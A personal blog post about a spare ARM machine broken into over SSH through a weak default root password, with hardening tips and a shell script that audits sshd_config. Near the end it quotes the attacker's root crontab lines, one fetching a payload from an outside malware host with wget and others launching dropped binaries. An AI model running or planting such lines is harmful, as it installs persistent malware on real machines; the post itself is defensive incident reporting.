Three days to possession

As an experiment, I hooked up a spare ARM machine to the internet and left it running Tor. It only took three days for a script kiddie to break in, as it turns out the pre-built rootfs I used has a poor default root password.

So the lessons are:

  • Always clear the root password.
  • Disable root login in sshd_config.
  • Disable password logins in sshd_config and use keys only.
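
As an added example (not part of the original post), here is a small POSIX shell audit for the two sshd_config settings in the list above. The two sample config files it writes to a temporary directory are constructed for the demo, and the function names sshd_effective and sshd_verdict are illustrative, not from any real tool.

```shell
#!/bin/sh
# Added example, not from the original post: check whether an sshd_config
# disables root login and password authentication. Sample files below are
# constructed for the demo; sshd_effective/sshd_verdict are illustrative names.

# Print the effective top-level value of a keyword. sshd honours the FIRST
# occurrence of a keyword, and everything after a "Match" line is conditional,
# so stop at the first hit or at the first Match block. Prints nothing if unset.
sshd_effective() {
    awk -v key="$2" '
        tolower($1) == "match"       { exit }
        tolower($1) == tolower(key)  { print $2; exit }
    ' "$1"
}

# Print OK or WEAK on stdout (findings go to stderr). An unset keyword falls
# back to the OpenSSH build default: PasswordAuthentication defaults to yes,
# and PermitRootLogin defaulted to yes before OpenSSH 7.0, which is what an
# old pre-built rootfs may ship, so unset counts as weak.
sshd_verdict() {
    cfg=$1
    findings=0
    root=$(sshd_effective "$cfg" PermitRootLogin)
    pw=$(sshd_effective "$cfg" PasswordAuthentication)
    if [ "$root" != "no" ]; then
        echo "$cfg: PermitRootLogin is '${root:-unset}' (want: no)" >&2
        findings=$((findings + 1))
    fi
    if [ "$pw" != "no" ]; then
        echo "$cfg: PasswordAuthentication is '${pw:-unset}' (want: no)" >&2
        findings=$((findings + 1))
    fi
    if [ "$findings" -eq 0 ]; then echo OK; else echo WEAK; fi
}

# Constructed samples: a typical rootfs default and a hardened version.
SAMPLE_DIR=$(mktemp -d)
WEAK_CFG=$SAMPLE_DIR/sshd_config.weak
HARD_CFG=$SAMPLE_DIR/sshd_config.hardened

cat > "$WEAK_CFG" <<'EOF'
Port 22
#PermitRootLogin prohibit-password
PasswordAuthentication yes
ChallengeResponseAuthentication no
EOF

cat > "$HARD_CFG" <<'EOF'
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
KbdInteractiveAuthentication no
AuthenticationMethods publickey
EOF

for f in "$WEAK_CFG" "$HARD_CFG"; do
    printf '%s -> %s\n' "$f" "$(sshd_verdict "$f")"
done
```

This only reads the top-level keywords of one file. On a live host, compare with the output of `sshd -T`, which prints the effective configuration after Include and Match processing, and remember that the root password itself is a separate item: an empty or default password in /etc/shadow is not something sshd_config can fix.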

The particular virus uses Perl to run a script that masquerades as /usr/sbin/apache/log. It overwrites /var/spool/cron/crontab/root with entries that keep re-fetching its components and survive a reboot, dropping binaries such as /etc/atddd. Some example lines:

    */120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
    */99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
    */100 * * * * nohup /etc/kysapd > /dev/null 2>&1&

These are all x86 statically linked binaries. I don’t think they run too well on ARM 🙂

Time to nuke the system. It’s the only way to be sure.
Michael Hope
Software Engineer